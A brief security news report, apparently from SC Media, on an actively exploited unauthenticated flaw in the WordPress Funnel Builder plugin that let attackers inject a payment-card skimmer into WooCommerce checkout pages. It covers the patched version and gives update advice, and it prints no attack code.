Vulnerability Management

WordPress Funnel Builder vulnerability exploited to steal payment data

A critical vulnerability in the WordPress Funnel Builder plugin was actively exploited, allowing attackers to inject malicious JavaScript into WooCommerce checkout pages and steal customer payment information. The flaw, which affects all versions prior to 3.15.0.3, can be exploited without authentication, Bleeping Computer reports.

The vulnerability in the Funnel Builder plugin, used by over 40,000 websites, allows unauthenticated attackers to modify global settings via an unprotected checkout endpoint. This enables the injection of arbitrary JavaScript into the plugin's "External Scripts" setting, leading to malicious code execution on every checkout page. Security company Sansec detected the attacks, noting that the payload disguised itself as a legitimate analytics script to establish a WebSocket connection to an attacker-controlled server. This server then delivers a payment card skimmer designed to steal credit card numbers, CVVs, billing addresses, and other customer data.

FunnelKit released version 3.15.0.3 to address the vulnerability and recommended that all users update immediately and review their external scripts for any rogue additions.

Source: Bleeping Computer

Related Events

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds